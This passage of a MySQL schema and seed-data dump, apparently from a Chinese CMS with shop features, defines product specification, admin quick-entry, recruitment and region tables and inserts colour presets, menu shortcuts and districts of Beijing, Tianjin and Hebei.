) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='产品规格数据表';
-- -----------------------------
-- Table structure for `ey_product_spec_data_handle`
-- -----------------------------
DROP TABLE IF EXISTS `ey_product_spec_data_handle`;
CREATE TABLE `ey_product_spec_data_handle` (
`spec_id` int(10) DEFAULT '0' COMMENT '对应 product_spec_data 数据表',
`aid` int(10) DEFAULT '0' COMMENT '对应 product_spec_data 数据表',
`spec_mark_id` int(10) DEFAULT '0' COMMENT '对应 product_spec_data 数据表',
`spec_name` varchar(100) DEFAULT '' COMMENT '对应 product_spec_data 数据表',
`spec_value_id` int(10) DEFAULT '0' COMMENT '对应 product_spec_data 数据表',
`spec_value` varchar(100) DEFAULT '' COMMENT '对应 product_spec_data 数据表',
`spec_is_select` tinyint(1) DEFAULT '0' COMMENT '对应 product_spec_data 数据表',
`lang` varchar(50) DEFAULT 'cn' COMMENT '对应 product_spec_data 数据表',
`add_time` int(11) DEFAULT '0' COMMENT '对应 product_spec_data 数据表',
`update_time` int(11) DEFAULT '0' COMMENT '对应 product_spec_data 数据表'
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='商品规格表(product_spec_data)预处理规格数据表';
-- -----------------------------
-- Table structure for `ey_product_spec_preset`
-- -----------------------------
DROP TABLE IF EXISTS `ey_product_spec_preset`;
CREATE TABLE `ey_product_spec_preset` (
`preset_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`preset_mark_id` int(10) DEFAULT '0' COMMENT '预设参数标记ID',
`preset_name` varchar(100) DEFAULT '' COMMENT '规格名称',
`preset_value` varchar(100) DEFAULT '' COMMENT '规格值',
`spec_sync` tinyint(1) unsigned DEFAULT '0' COMMENT '是否同步到已发布的商品规格:0否,1是。',
`sort_order` int(10) DEFAULT '100' COMMENT '排序号',
`merchant_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '多商家ID',
`product_add` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否在商品添加或编辑页添加的规格信息,0否,1是,默认0',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`preset_id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='产品规格预设表';
-- -----------------------------
-- Records of `ey_product_spec_preset`
-- -----------------------------
INSERT INTO `ey_product_spec_preset` VALUES ('1', '1', '产品颜色', '红', '0', '100', '0', '0', 'cn', '1565752372', '1565752623');
INSERT INTO `ey_product_spec_preset` VALUES ('2', '1', '产品颜色', '蓝', '0', '100', '0', '0', 'cn', '1565752372', '1565752623');
INSERT INTO `ey_product_spec_preset` VALUES ('3', '1', '产品颜色', '黄', '0', '100', '0', '0', 'cn', '1565752372', '1565752623');
-- -----------------------------
-- Table structure for `ey_product_spec_value`
-- -----------------------------
DROP TABLE IF EXISTS `ey_product_spec_value`;
CREATE TABLE `ey_product_spec_value` (
`value_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`aid` int(10) NOT NULL DEFAULT '0' COMMENT '产品ID',
`spec_value_id` varchar(100) NOT NULL DEFAULT '' COMMENT '规格值ID',
`spec_price` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '规格价格',
`spec_stock` int(10) NOT NULL DEFAULT '0' COMMENT '规格库存',
`spec_sales_num` int(10) NOT NULL DEFAULT '0' COMMENT '销售量',
`seckill_price` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '秒杀价格',
`seckill_stock` int(10) NOT NULL DEFAULT '0' COMMENT '秒杀库存(独立库存,与spec_stock/限时折扣库存不同步)',
`seckill_sales_num` int(10) NOT NULL DEFAULT '0' COMMENT '秒杀销售量',
`is_seckill` tinyint(1) NOT NULL DEFAULT '0' COMMENT '0-普通 1-秒杀',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`discount_price` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '限时折扣价格',
`discount_stock` int(10) NOT NULL DEFAULT '0' COMMENT '限时折扣库存(独立库存,与spec_stock/秒杀库存不同步)',
`discount_sales_num` int(10) NOT NULL DEFAULT '0' COMMENT '限时折扣销售量',
`is_discount` tinyint(1) NOT NULL DEFAULT '0' COMMENT '0-普通 1-限时折扣',
PRIMARY KEY (`value_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='产品多规格组装表';
-- -----------------------------
-- Table structure for `ey_quickentry`
-- -----------------------------
DROP TABLE IF EXISTS `ey_quickentry`;
CREATE TABLE `ey_quickentry` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`title` varchar(20) DEFAULT '' COMMENT '名称',
`laytext` varchar(50) DEFAULT '' COMMENT '完整标题',
`type` smallint(5) DEFAULT '0' COMMENT '归类,1=快捷入口,2=内容统计',
`controller` varchar(50) DEFAULT '' COMMENT '控制器名',
`action` varchar(20) DEFAULT '' COMMENT '操作名',
`vars` varchar(100) DEFAULT '' COMMENT 'URL参数字符串',
`groups` smallint(5) DEFAULT '0' COMMENT '分组,1=模型',
`checked` tinyint(4) DEFAULT '0' COMMENT '选中,0=否,1=是',
`status` tinyint(1) DEFAULT '1' COMMENT '状态,1=有效,0=无效',
`sort_order` int(10) DEFAULT '0' COMMENT '排序',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `type` (`type`,`status`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=40 DEFAULT CHARSET=utf8 COMMENT='快捷入口表';
-- -----------------------------
-- Records of `ey_quickentry`
-- -----------------------------
INSERT INTO `ey_quickentry` VALUES ('1', '产品', '产品列表', '1', 'Product', 'index', 'channel=2', '1', '0', '0', '3', '1569232484', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('2', '下载', '下载列表', '1', 'Download', 'index', 'channel=4', '1', '0', '0', '4', '1569232484', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('3', '文章', '文章列表', '1', 'Article', 'index', 'channel=1', '1', '0', '1', '6', '1569232484', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('4', '图集', '图集列表', '1', 'Images', 'index', 'channel=3', '1', '0', '0', '7', '1569232484', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('5', '内容管理', '内容列表', '1', 'Archives', 'index', '', '0', '0', '1', '13', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('7', '回收站', '回收站', '1', 'RecycleBin', 'archives_index', '', '0', '1', '1', '4', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('8', '栏目管理', '栏目管理', '1', 'Arctype', 'index', '', '0', '0', '1', '5', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('9', '留言', '留言管理', '1', 'Form', 'index', '', '1', '0', '1', '6', '1569232484', '1686213571');
INSERT INTO `ey_quickentry` VALUES ('10', '网站信息', '网站信息', '1', 'System', 'web', '', '0', '0', '1', '7', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('11', '水印配置', '水印配置', '1', 'System', 'water', '', '0', '1', '1', '8', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('12', '缩略图配置', '缩略图配置', '1', 'System', 'thumb', '', '0', '1', '1', '9', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('13', '数据备份', '数据备份', '1', 'Tools', 'index', '', '0', '0', '1', '11', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('14', 'URL配置', 'URL配置', '1', 'Seo', 'seo', '', '0', '1', '1', '1', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('15', '模板管理', '模板管理', '1', 'Filemanager', 'index', '', '0', '1', '1', '6', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('16', 'SiteMap', 'SiteMap', '1', 'Sitemap', 'index', '', '0', '1', '1', '12', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('17', '频道模型', '频道模型', '1', 'Channeltype', 'index', '', '0', '1', '1', '2', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('18', '广告管理', '广告管理', '1', 'AdPosition', 'index', '', '0', '0', '1', '3', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('19', '友情链接', '友情链接', '1', 'Links', 'index', '', '0', '0', '1', '10', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('20', 'Tags管理', 'Tags管理', '1', 'Tags', 'index', '', '0', '1', '1', '14', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('21', '管理员管理', '管理员管理', '1', 'Admin', 'index', '', '0', '0', '1', '15', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('22', '接口配置', '接口配置', '1', 'System', 'api_conf', '', '0', '1', '1', '16', '1569232484', '1571893529');
INSERT INTO `ey_quickentry` VALUES ('23', '文章', '文章列表', '2', 'Article', 'index', 'channel=1', '1', '1', '1', '1', '1569310798', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('24', '产品', '产品列表', '2', 'Product', 'index', 'channel=2', '1', '0', '0', '2', '1569310798', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('25', '下载', '下载列表', '2', 'Download', 'index', 'channel=4', '1', '0', '0', '4', '1569310798', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('26', '图集', '图集列表', '2', 'Images', 'index', 'channel=3', '1', '0', '0', '3', '1569310798', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('27', '留言', '留言管理', '2', 'Form', 'index', '', '1', '0', '1', '5', '1569310798', '1686213571');
INSERT INTO `ey_quickentry` VALUES ('28', '广告', '广告管理', '2', 'AdPosition', 'index', '', '0', '1', '1', '8', '1569232484', '1571898872');
INSERT INTO `ey_quickentry` VALUES ('29', '友情链接', '友情链接', '2', 'Links', 'index', '', '0', '1', '1', '9', '1569232484', '1571898872');
INSERT INTO `ey_quickentry` VALUES ('30', 'Tags标签', 'Tags管理', '2', 'Tags', 'index', '', '0', '1', '1', '10', '1569232484', '1571898872');
INSERT INTO `ey_quickentry` VALUES ('31', '会员', '会员管理', '2', 'Member', 'users_index', '', '0', '0', '0', '7', '1569232484', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('32', '插件应用', '插件应用', '1', 'Weapp', 'index', '', '0', '0', '0', '17', '1569232484', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('33', '会员中心', '会员中心', '1', 'Member', 'users_index', '', '0', '0', '0', '18', '1569232484', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('34', '商城中心', '商城中心', '1', 'Shop', 'index', '', '0', '0', '0', '19', '1569232484', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('35', '订单', '订单管理', '2', 'Shop', 'index', '', '0', '0', '0', '6', '1569232484', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('37', '专题', '专题列表', '2', 'Special', 'index', 'channel=7', '1', '0', '0', '7', '1600078966', '1686213673');
INSERT INTO `ey_quickentry` VALUES ('39', '视频', '视频列表', '2', 'Media', 'index', 'channel=5', '1', '0', '0', '4', '1569310798', '1686213673');
-- -----------------------------
-- Table structure for `ey_recruit_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_recruit_content`;
CREATE TABLE `ey_recruit_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`gzdd` varchar(200) NOT NULL DEFAULT '' COMMENT '工作地点',
`xlyq` varchar(200) NOT NULL DEFAULT '' COMMENT '学历要求',
`xzdy` varchar(200) NOT NULL DEFAULT '' COMMENT '薪资待遇',
`gzxz` varchar(200) NOT NULL DEFAULT '' COMMENT '工作性质',
`gznx` varchar(200) NOT NULL DEFAULT '' COMMENT '工作年限',
`zprs` varchar(200) NOT NULL DEFAULT '' COMMENT '招聘人数',
`nnxq` longtext COMMENT '内容详情',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Table structure for `ey_region`
-- -----------------------------
DROP TABLE IF EXISTS `ey_region`;
CREATE TABLE `ey_region` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '表id',
`name` varchar(32) DEFAULT '' COMMENT '地区名称',
`level` tinyint(4) DEFAULT '0' COMMENT '地区等级 分省市县区',
`parent_id` int(10) DEFAULT '0' COMMENT '父id',
`initial` varchar(5) DEFAULT '' COMMENT '首字母',
PRIMARY KEY (`id`),
KEY `parent_id` (`parent_id`) USING BTREE,
KEY `level` (`level`) USING BTREE,
KEY `initial` (`initial`)
) ENGINE=MyISAM AUTO_INCREMENT=47971 DEFAULT CHARSET=utf8 COMMENT='区域表';
-- -----------------------------
-- Records of `ey_region`
-- -----------------------------
INSERT INTO `ey_region` VALUES ('1', '北京市', '1', '0', 'B');
INSERT INTO `ey_region` VALUES ('2', '北京市', '2', '1', 'B');
INSERT INTO `ey_region` VALUES ('3', '东城区', '3', '2', 'D');
INSERT INTO `ey_region` VALUES ('14', '西城区', '3', '2', 'X');
INSERT INTO `ey_region` VALUES ('22', '崇文区', '3', '2', 'C');
INSERT INTO `ey_region` VALUES ('30', '宣武区', '3', '2', 'X');
INSERT INTO `ey_region` VALUES ('39', '朝阳区', '3', '2', 'C');
INSERT INTO `ey_region` VALUES ('83', '丰台区', '3', '2', 'F');
INSERT INTO `ey_region` VALUES ('105', '石景山区', '3', '2', 'S');
INSERT INTO `ey_region` VALUES ('115', '海淀区', '3', '2', 'H');
INSERT INTO `ey_region` VALUES ('145', '门头沟区', '3', '2', 'M');
INSERT INTO `ey_region` VALUES ('159', '房山区', '3', '2', 'F');
INSERT INTO `ey_region` VALUES ('188', '通州区', '3', '2', 'T');
INSERT INTO `ey_region` VALUES ('204', '顺义区', '3', '2', 'S');
INSERT INTO `ey_region` VALUES ('227', '昌平区', '3', '2', 'C');
INSERT INTO `ey_region` VALUES ('245', '大兴区', '3', '2', 'D');
INSERT INTO `ey_region` VALUES ('264', '怀柔区', '3', '2', 'H');
INSERT INTO `ey_region` VALUES ('281', '平谷区', '3', '2', 'P');
INSERT INTO `ey_region` VALUES ('301', '密云区', '3', '2', 'M');
INSERT INTO `ey_region` VALUES ('322', '延庆区', '3', '2', 'Y');
INSERT INTO `ey_region` VALUES ('338', '天津市', '1', '0', 'T');
INSERT INTO `ey_region` VALUES ('339', '天津市', '2', '338', 'T');
INSERT INTO `ey_region` VALUES ('340', '和平区', '3', '339', 'H');
INSERT INTO `ey_region` VALUES ('347', '河东区', '3', '339', 'H');
INSERT INTO `ey_region` VALUES ('361', '河西区', '3', '339', 'H');
INSERT INTO `ey_region` VALUES ('375', '南开区', '3', '339', 'N');
INSERT INTO `ey_region` VALUES ('388', '河北区', '3', '339', 'H');
INSERT INTO `ey_region` VALUES ('399', '红桥区', '3', '339', 'H');
INSERT INTO `ey_region` VALUES ('410', '塘沽区', '3', '339', 'T');
INSERT INTO `ey_region` VALUES ('425', '汉沽区', '3', '339', 'H');
INSERT INTO `ey_region` VALUES ('435', '大港区', '3', '339', 'D');
INSERT INTO `ey_region` VALUES ('445', '东丽区', '3', '339', 'D');
INSERT INTO `ey_region` VALUES ('460', '西青区', '3', '339', 'X');
INSERT INTO `ey_region` VALUES ('473', '津南区', '3', '339', 'J');
INSERT INTO `ey_region` VALUES ('488', '北辰区', '3', '339', 'B');
INSERT INTO `ey_region` VALUES ('504', '武清区', '3', '339', 'W');
INSERT INTO `ey_region` VALUES ('538', '宝坻区', '3', '339', 'B');
INSERT INTO `ey_region` VALUES ('570', '宁河区', '3', '339', 'N');
INSERT INTO `ey_region` VALUES ('586', '静海区', '3', '339', 'J');
INSERT INTO `ey_region` VALUES ('608', '蓟州区', '3', '339', 'J');
INSERT INTO `ey_region` VALUES ('636', '河北省', '1', '0', 'H');
INSERT INTO `ey_region` VALUES ('637', '石家庄市', '2', '636', 'S');
INSERT INTO `ey_region` VALUES ('638', '市辖区', '3', '637', 'S');
INSERT INTO `ey_region` VALUES ('639', '长安区', '3', '637', 'C');
INSERT INTO `ey_region` VALUES ('651', '桥东区', '3', '637', 'Q');
INSERT INTO `ey_region` VALUES ('662', '桥西区', '3', '637', 'Q');
INSERT INTO `ey_region` VALUES ('675', '新华区', '3', '637', 'X');
INSERT INTO `ey_region` VALUES ('691', '井陉矿区', '3', '637', 'J');
INSERT INTO `ey_region` VALUES ('697', '裕华区', '3', '637', 'Y');
INSERT INTO `ey_region` VALUES ('708', '井陉县', '3', '637', 'J');
INSERT INTO `ey_region` VALUES ('726', '正定县', '3', '637', 'Z');
INSERT INTO `ey_region` VALUES ('736', '栾城县', '3', '637', 'L');
INSERT INTO `ey_region` VALUES ('745', '行唐县', '3', '637', 'X');
INSERT INTO `ey_region` VALUES ('761', '灵寿县', '3', '637', 'L');
INSERT INTO `ey_region` VALUES ('777', '高邑县', '3', '637', 'G');
INSERT INTO `ey_region` VALUES ('783', '深泽县', '3', '637', 'S');
INSERT INTO `ey_region` VALUES ('790', '赞皇县', '3', '637', 'Z');
INSERT INTO `ey_region` VALUES ('802', '无极县', '3', '637', 'W');
INSERT INTO `ey_region` VALUES ('814', '平山县', '3', '637', 'P');
INSERT INTO `ey_region` VALUES ('838', '元氏县', '3', '637', 'Y');
INSERT INTO `ey_region` VALUES ('854', '赵县', '3', '637', 'Z');
INSERT INTO `ey_region` VALUES ('866', '辛集市', '3', '637', 'X');
INSERT INTO `ey_region` VALUES ('882', '藁城市', '3', '637', 'G');
INSERT INTO `ey_region` VALUES ('898', '晋州市', '3', '637', 'J');
INSERT INTO `ey_region` VALUES ('909', '新乐市', '3', '637', 'X');
INSERT INTO `ey_region` VALUES ('922', '鹿泉市', '3', '637', 'L');
INSERT INTO `ey_region` VALUES ('936', '唐山市', '2', '636', 'T');
INSERT INTO `ey_region` VALUES ('937', '市辖区', '3', '936', 'S');
INSERT INTO `ey_region` VALUES ('938', '路南区', '3', '936', 'L');
INSERT INTO `ey_region` VALUES ('952', '路北区', '3', '936', 'L');
INSERT INTO `ey_region` VALUES ('965', '古冶区', '3', '936', 'G');
INSERT INTO `ey_region` VALUES ('977', '开平区', '3', '936', 'K');
INSERT INTO `ey_region` VALUES ('989', '丰南区', '3', '936', 'F');
INSERT INTO `ey_region` VALUES ('1007', '丰润区', '3', '936', 'F');
INSERT INTO `ey_region` VALUES ('1034', '滦县', '3', '936', 'L');
INSERT INTO `ey_region` VALUES ('1048', '滦南县', '3', '936', 'L');
INSERT INTO `ey_region` VALUES ('1067', '乐亭县', '3', '936', 'L');
INSERT INTO `ey_region` VALUES ('1085', '迁西县', '3', '936', 'Q');
INSERT INTO `ey_region` VALUES ('1104', '玉田县', '3', '936', 'Y');
INSERT INTO `ey_region` VALUES ('1125', '唐海县', '3', '936', 'T');
INSERT INTO `ey_region` VALUES ('1140', '遵化市', '3', '936', 'Z');
INSERT INTO `ey_region` VALUES ('1168', '迁安市', '3', '936', 'Q');
INSERT INTO `ey_region` VALUES ('1188', '秦皇岛市', '2', '636', 'Q');
INSERT INTO `ey_region` VALUES ('1189', '市辖区', '3', '1188', 'S');
INSERT INTO `ey_region` VALUES ('1190', '海港区', '3', '1188', 'H');
INSERT INTO `ey_region` VALUES ('1208', '山海关区', '3', '1188', 'S');
INSERT INTO `ey_region` VALUES ('1218', '北戴河区', '3', '1188', 'B');
INSERT INTO `ey_region` VALUES ('1223', '青龙县', '3', '1188', 'Q');
INSERT INTO `ey_region` VALUES ('1249', '昌黎县', '3', '1188', 'C');
INSERT INTO `ey_region` VALUES ('1266', '抚宁县', '3', '1188', 'F');
INSERT INTO `ey_region` VALUES ('1278', '卢龙县', '3', '1188', 'L');
INSERT INTO `ey_region` VALUES ('1291', '邯郸市', '2', '636', 'H');
INSERT INTO `ey_region` VALUES ('1292', '市辖区', '3', '1291', 'S');
INSERT INTO `ey_region` VALUES ('1293', '邯山区', '3', '1291', 'H');
INSERT INTO `ey_region` VALUES ('1307', '丛台区', '3', '1291', 'C');
INSERT INTO `ey_region` VALUES ('1319', '复兴区', '3', '1291', 'F');
INSERT INTO `ey_region` VALUES ('1329', '峰峰矿区', '3', '1291', 'F');
INSERT INTO `ey_region` VALUES ('1339', '邯郸县', '3', '1291', 'H');
INSERT INTO `ey_region` VALUES ('1350', '临漳县', '3', '1291', 'L');
INSERT INTO `ey_region` VALUES ('1365', '成安县', '3', '1291', 'C');
INSERT INTO `ey_region` VALUES ('1375', '大名县', '3', '1291', 'D');
INSERT INTO `ey_region` VALUES ('1396', '涉县', '3', '1291', 'S');
INSERT INTO `ey_region` VALUES ('1414', '磁县', '3', '1291', 'C');
INSERT INTO `ey_region` VALUES ('1434', '肥乡县', '3', '1291', 'F');
INSERT INTO `ey_region` VALUES ('1444', '永年县', '3', '1291', 'Y');
INSERT INTO `ey_region` VALUES ('1465', '邱县', '3', '1291', 'Q');
INSERT INTO `ey_region` VALUES ('1473', '鸡泽县', '3', '1291', 'J');
INSERT INTO `ey_region` VALUES ('1481', '广平县', '3', '1291', 'G');
INSERT INTO `ey_region` VALUES ('1489', '馆陶县', '3', '1291', 'G');
INSERT INTO `ey_region` VALUES ('1498', '魏县', '3', '1291', 'W');
INSERT INTO `ey_region` VALUES ('1520', '曲周县', '3', '1291', 'Q');
INSERT INTO `ey_region` VALUES ('1531', '武安市', '3', '1291', 'W');
INSERT INTO `ey_region` VALUES ('1554', '邢台市', '2', '636', 'X');
INSERT INTO `ey_region` VALUES ('1555', '市辖区', '3', '1554', 'S');
INSERT INTO `ey_region` VALUES ('1556', '桥东区', '3', '1554', 'Q');
INSERT INTO `ey_region` VALUES ('1564', '桥西区', '3', '1554', 'Q');
INSERT INTO `ey_region` VALUES ('1572', '邢台县', '3', '1554', 'X');
INSERT INTO `ey_region` VALUES ('1593', '临城县', '3', '1554', 'L');
INSERT INTO `ey_region` VALUES ('1602', '内邱县', '3', '1554', 'N');
INSERT INTO `ey_region` VALUES ('1612', '柏乡县', '3', '1554', 'B');
INSERT INTO `ey_region` VALUES ('1619', '隆尧县', '3', '1554', 'L');
INSERT INTO `ey_region` VALUES ('1633', '任县', '3', '1554', 'R');
INSERT INTO `ey_region` VALUES ('1642', '南和县', '3', '1554', 'N');
INSERT INTO `ey_region` VALUES ('1651', '宁晋县', '3', '1554', 'N');
INSERT INTO `ey_region` VALUES ('1669', '巨鹿县', '3', '1554', 'J');
INSERT INTO `ey_region` VALUES ('1680', '新河县', '3', '1554', 'X');
INSERT INTO `ey_region` VALUES ('1687', '广宗县', '3', '1554', 'G');
INSERT INTO `ey_region` VALUES ('1696', '平乡县', '3', '1554', 'P');
INSERT INTO `ey_region` VALUES ('1704', '威县', '3', '1554', 'W');
INSERT INTO `ey_region` VALUES ('1721', '清河县', '3', '1554', 'Q');
INSERT INTO `ey_region` VALUES ('1728', '临西县', '3', '1554', 'L');
INSERT INTO `ey_region` VALUES ('1738', '南宫市', '3', '1554', 'N');
INSERT INTO `ey_region` VALUES ('1754', '沙河市', '3', '1554', 'S');
INSERT INTO `ey_region` VALUES ('1772', '保定市', '2', '636', 'B');
INSERT INTO `ey_region` VALUES ('1773', '市辖区', '3', '1772', 'S');
INSERT INTO `ey_region` VALUES ('1774', '新市区', '3', '1772', 'X');
INSERT INTO `ey_region` VALUES ('1787', '北市区', '3', '1772', 'B');
INSERT INTO `ey_region` VALUES ('1796', '南市区', '3', '1772', 'N');
INSERT INTO `ey_region` VALUES ('1806', '满城区', '3', '1772', 'M');
INSERT INTO `ey_region` VALUES ('1820', '清苑区', '3', '1772', 'Q');
INSERT INTO `ey_region` VALUES ('1839', '涞水县', '3', '1772', 'L');
INSERT INTO `ey_region` VALUES ('1856', '阜平县', '3', '1772', 'F');
INSERT INTO `ey_region` VALUES ('1870', '徐水区', '3', '1772', 'X');
INSERT INTO `ey_region` VALUES ('1885', '定兴县', '3', '1772', 'D');
INSERT INTO `ey_region` VALUES ('1902', '唐县', '3', '1772', 'T');
INSERT INTO `ey_region` VALUES ('1923', '高阳县', '3', '1772', 'G');
INSERT INTO `ey_region` VALUES ('1933', '容城县', '3', '1772', 'R');
INSERT INTO `ey_region` VALUES ('1942', '涞源县', '3', '1772', 'L');
INSERT INTO `ey_region` VALUES ('1960', '望都县', '3', '1772', 'W');
INSERT INTO `ey_region` VALUES ('1969', '安新县', '3', '1772', 'A');
INSERT INTO `ey_region` VALUES ('1982', '易县', '3', '1772', 'Y');
INSERT INTO `ey_region` VALUES ('2010', '曲阳县', '3', '1772', 'Q');
INSERT INTO `ey_region` VALUES ('2029', '蠡县', '3', '1772', 'L');
INSERT INTO `ey_region` VALUES ('2043', '顺平县', '3', '1772', 'S');
INSERT INTO `ey_region` VALUES ('2054', '博野县', '3', '1772', 'B');
INSERT INTO `ey_region` VALUES ('2062', '雄县', '3', '1772', 'X');
INSERT INTO `ey_region` VALUES ('2072', '涿州市', '3', '1772', 'Z');
INSERT INTO `ey_region` VALUES ('2088', '定州市', '3', '1772', 'D');
INSERT INTO `ey_region` VALUES ('2114', '安国市', '3', '1772', 'A');
INSERT INTO `ey_region` VALUES ('2126', '高碑店市', '3', '1772', 'G');
INSERT INTO `ey_region` VALUES ('2142', '张家口市', '2', '636', 'Z');
INSERT INTO `ey_region` VALUES ('2143', '市辖区', '3', '2142', 'S');
INSERT INTO `ey_region` VALUES ('2144', '桥东区', '3', '2142', 'Q');
INSERT INTO `ey_region` VALUES ('2154', '桥西区', '3', '2142', 'Q');
INSERT INTO `ey_region` VALUES ('2164', '宣化区', '3', '2142', 'X');
INSERT INTO `ey_region` VALUES ('2176', '下花园区', '3', '2142', 'X');
INSERT INTO `ey_region` VALUES ('2183', '宣化县', '3', '2142', 'X');
INSERT INTO `ey_region` VALUES ('2198', '张北县', '3', '2142', 'Z');
INSERT INTO `ey_region` VALUES ('2220', '康保县', '3', '2142', 'K');
INSERT INTO `ey_region` VALUES ('2237', '沽源县', '3', '2142', 'G');
INSERT INTO `ey_region` VALUES ('2256', '尚义县', '3', '2142', 'S');
INSERT INTO `ey_region` VALUES ('2271', '蔚县', '3', '2142', 'W');
INSERT INTO `ey_region` VALUES ('2294', '阳原县', '3', '2142', 'Y');
INSERT INTO `ey_region` VALUES ('2309', '怀安县', '3', '2142', 'H');
INSERT INTO `ey_region` VALUES ('2321', '万全县', '3', '2142', 'W');
INSERT INTO `ey_region` VALUES ('2333', '怀来县', '3', '2142', 'H');
INSERT INTO `ey_region` VALUES ('2351', '涿鹿县', '3', '2142', 'Z');
INSERT INTO `ey_region` VALUES ('2369', '赤城县', '3', '2142', 'C');
INSERT INTO `ey_region` VALUES ('2388', '崇礼县', '3', '2142', 'C');
INSERT INTO `ey_region` VALUES ('2400', '承德市', '2', '636', 'C');
INSERT INTO `ey_region` VALUES ('2401', '市辖区', '3', '2400', 'S');
INSERT INTO `ey_region` VALUES ('2402', '双桥区', '3', '2400', 'S');
INSERT INTO `ey_region` VALUES ('2415', '双滦区', '3', '2400', 'S');
INSERT INTO `ey_region` VALUES ('2422', '鹰手营子矿区', '3', '2400', 'Y');
INSERT INTO `ey_region` VALUES ('2427', '承德县', '3', '2400', 'C');
INSERT INTO `ey_region` VALUES ('2453', '兴隆县', '3', '2400', 'X');
INSERT INTO `ey_region` VALUES ('2474', '平泉县', '3', '2400', 'P');
INSERT INTO `ey_region` VALUES ('2494', '滦平县', '3', '2400', 'L');
INSERT INTO `ey_region` VALUES ('2517', '隆化县', '3', '2400', 'L');
INSERT INTO `ey_region` VALUES ('2543', '丰宁县', '3', '2400', 'F');
INSERT INTO `ey_region` VALUES ('2570', '宽城县', '3', '2400', 'K');
INSERT INTO `ey_region` VALUES ('2589', '围场县', '3', '2400', 'W');
INSERT INTO `ey_region` VALUES ('2629', '沧州市', '2', '636', 'C');
INSERT INTO `ey_region` VALUES ('2630', '市辖区', '3', '2629', 'S');
INSERT INTO `ey_region` VALUES ('2631', '新华区', '3', '2629', 'X');
INSERT INTO `ey_region` VALUES ('2639', '运河区', '3', '2629', 'Y');
INSERT INTO `ey_region` VALUES ('2648', '沧县', '3', '2629', 'C');
INSERT INTO `ey_region` VALUES ('2668', '青县', '3', '2629', 'Q');
INSERT INTO `ey_region` VALUES ('2680', '东光县', '3', '2629', 'D');
INSERT INTO `ey_region` VALUES ('2690', '海兴县', '3', '2629', 'H');
INSERT INTO `ey_region` VALUES ('2701', '盐山县', '3', '2629', 'Y');
INSERT INTO `ey_region` VALUES ('2714', '肃宁县', '3', '2629', 'S');
INSERT INTO `ey_region` VALUES ('2724', '南皮县', '3', '2629', 'N');
INSERT INTO `ey_region` VALUES ('2734', '吴桥县', '3', '2629', 'W');
INSERT INTO `ey_region` VALUES ('2745', '献县', '3', '2629', 'X');
INSERT INTO `ey_region` VALUES ('2765', '孟村县', '3', '2629', 'M');
INSERT INTO `ey_region` VALUES ('2772', '泊头市', '3', '2629', 'B');
INSERT INTO `ey_region` VALUES ('2788', '任邱市', '3', '2629', 'R');
INSERT INTO `ey_region` VALUES ('2809', '黄骅市', '3', '2629', 'H');
INSERT INTO `ey_region` VALUES ('2828', '河间市', '3', '2629', 'H');
INSERT INTO `ey_region` VALUES ('2849', '廊坊市', '2', '636', 'L');
INSERT INTO `ey_region` VALUES ('2850', '市辖区', '3', '2849', 'S');
